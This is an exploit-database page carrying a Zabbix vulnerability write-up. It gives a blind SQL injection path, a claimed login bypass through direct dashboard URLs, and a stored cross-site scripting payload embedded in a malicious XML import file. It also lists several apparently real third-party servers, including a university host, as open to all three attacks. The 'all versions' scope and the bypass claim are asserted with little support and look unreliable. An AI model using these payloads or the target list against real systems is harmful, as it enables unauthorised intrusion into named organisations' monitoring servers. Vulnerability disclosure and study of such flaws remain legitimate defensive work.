0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zabbix 5.x SQL Injection / Cross Site Scripting Vulnerabilities
[# Exploit Title: Zabbix all version / Multiple Vulnerabilities
# Exploit Author: TaurusOmar
# Twitter:@TaurusOmar
# HomePage:taurusomar.com
# CVSS: 3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
# Version: Zabbix [1.x, 2.x, 3.x, 4,x 5.x]
# Risk: High (9.0)
# Vendor Homepage: https://www.zabbix.com/
# Tested on: Arch Linux
# Greetz: PwnEc
# Software Description:
Zabbix is the ultimate enterprise-level software designed for real-time monitoring of millions of metrics collected from tens of thousands of servers, virtual machines and network devices.
With encryption support it is possible to secure communications between separate Zabbix components (such as Zabbix server, proxies, agents and command-line utilities) using Transport Layer
Security (TLS) protocol v.1.2. Certificate-based and pre-shared key-based encryption is supported. Encryption is optional and configurable for individual components.
# 1.) Vulnerability Description => Blind Sqli (affect all versions):
An error in the application allows executing sql statements blindly
Path: https://domain/zabbix/hostinventoriesoverview.php?sid=[RANDOM_TOKEN]+Blind_Sqli&form_refresh=1&groupid=0&groupby=alias
# 2.) Vulnerability Description => Bypass login (affect all versions):
An error in the security of the form allows the login page to be skipped directly to the administration panel, which allows an attacker to access the entire application,
managing to make queries, edit parameters, among others.
Path: http://domain/zabbix/index.php
Vulnerable Form:
<form method="post" action="index.php" accept-charset="utf-8" aria-label="Sign in">
<ul>
<li><label for="name">Username</label><input type="text" id="name" name="name" value="" maxlength="255" autofocus="autofocus"></li>
<li><label for="password">Password</label><input type="password" id="password" name="password" value="" maxlength="255"></li>
<li><input type="checkbox" id="autologin" name="autologin" value="1" class="checkbox-radio" checked="checked"><label for="autologin"><span></span>Remember me for 30 days</label></li>
<li><button type="submit" id="enter" name="enter" value="Sign in">Sign in</button></li>
<li class="sign-in-txt">or <a href="index.php?enter=guest">sign in as guest</a></li>
</ul>
</form>
Pocs Bypass login - access dashborad:
http://domain/zabbix/zabbix.php?action=dashboard.list
http://doamin/zabbix/zabbix.php?action=problem.view&ddreset=1
http://doamin/zabbix/overview.php?ddreset=1
http://doamin/zabbix/hostinventoriesoverview.php?ddreset=1
http://doamin/zabbix/screenconf.php
# 3.) Vulnerability Description => Stored Cross Site Scripting (affect all versions):
The application allows uploading an xml file which can be modified by the <name> parameter with a load util XSS
Path: https://domain//zabbix/screen.import.php?rules_preset=screen
Malicious File .xml
<?xml version="1.0" encoding="UTF-8"?>
<zabbix_export>
<version>3.4</version>
<date>2021-07-23T20:55:48Z</date>
<screens>
<screen>
<name>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</name>
<hsize>1</hsize>
<vsize>2</vsize>
<screen_items>
<screen_item>
<resourcetype>7</resourcetype>
<width>500</width>
<height>100</height>
<x>0</x>
<y>0</y>
<colspan>1</colspan>
<rowspan>1</rowspan>
<elements>0</elements>
<valign>0</valign>
<halign>0</halign>
<style>0</style>
<url/>
<dynamic>0</dynamic>
<sort_triggers>0</sort_triggers>
<resource>0</resource>
<max_columns>3</max_columns>
<application/>
</screen_item>
</screen_items>
</screen>
</screens>
</zabbix_export>
# 4.) Samples web Vulnerabilities whit diferent version:
https://monitoreouio.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://monitoreogye.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://zabbix.iwinds.com.ar/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://www.cse.iitb.ac.in/soumen-pc/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
http://monitor.esprida.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
http://demo-zabbix.racom.eu/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
#######
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's
# responsibility.
#
#######
# 0day.today [2024-11-16] #